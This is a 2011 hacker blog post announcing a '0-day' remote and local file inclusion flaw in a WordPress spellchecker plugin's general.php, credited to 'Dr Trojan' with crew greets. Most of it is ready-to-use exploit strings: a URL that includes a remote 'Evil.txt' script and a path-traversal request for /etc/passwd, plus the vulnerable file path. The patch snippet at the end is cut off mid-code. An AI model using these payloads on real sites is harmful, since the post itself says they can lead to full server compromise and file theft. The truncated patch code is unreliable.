Followers

Friday, April 15, 2011

0-day RFI & LFI in wordpress 3.1 Plugin Vulnerability RELEASED

Web References:-
http://packetstormsecurity.org/files/100297/WordPress-Spellchecker-Local-File-Inclusion-Remote-File-Inclusion.html
http://packetstorm.linuxsecurity.com/1104-exploits/wpspellchecker-rfilfi.txt
http://securityreason.com/wlb_show/WLB-2011040079
http://www.securityhome.eu/exploits/exploit.php?eid=13843116614da43163eb7a76.20091642
---------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
======++++++  RFI & LFI Wordpress Spellchecker Plugin Vulnerability  ++++++======
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
---------------------------------------------------------------------------------
Released Date = 12/4/2011
---------------------------------------------------------------------------------
Author = Dr Trojan (www.paksecteam.com)
---------------------------------------------------------------------------------
Greets = Sacred1947 - ShozY - Shadow008 - HackerBradri - Death Angel - Yasir Fati
---------------------------------------------------------------------------------
Version = 3.1
---------------------------------------------------------------------------------
Tested On = Windows 7 & Xampp
---------------------------------------------------------------------------------
Rfi Exploit = /general.php?file=http://sitename.com/Evil.txt?
Lfi Exploit = /general.php?file=../../../../../../../etc/passwd
Root Location = wordpress/wp-includes/js/tinymce/plugins/spellchecker/includes/general.php
Web Location = www.sitename.com/general.php?file=
P.O.C:-
RFI Example = www.sitename.com/general.php?file=http://sitename.com/Evil.txt?
LFI Example =  www.sitename.com/general.php?file=../../../../../../../etc/passwd

User Input = $_GET
Potentially Vulnerable Function    = require       
Vulnerability description:-
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability.
User tainted data is used when creating the file name that will be included into the current file.
PHP code in this file will be evaluated, non-PHP code will be embedded to the output.
This vulnerability can lead to full server compromise.
Vulnerable Example Code =

Patch for vulnerability: Build a whitelist for positive file names. Do not only limit the file name to specific paths or extensions.
php", "main.php"); if(!in_array($_GET["file"], $files)) exit;  ?>

Seja o primeiro a comentar

Post a Comment

Flags Counter

free counters

Background Mp3 Player

About Me

My Photo
Dr Trojan
Find Me On GooGle,Search UrduHack.
View my complete profile

Root@Paki -- Dr Trojan-H4x0rL1f3 -- © 2008 Template by Dicas Blogger.

TOPO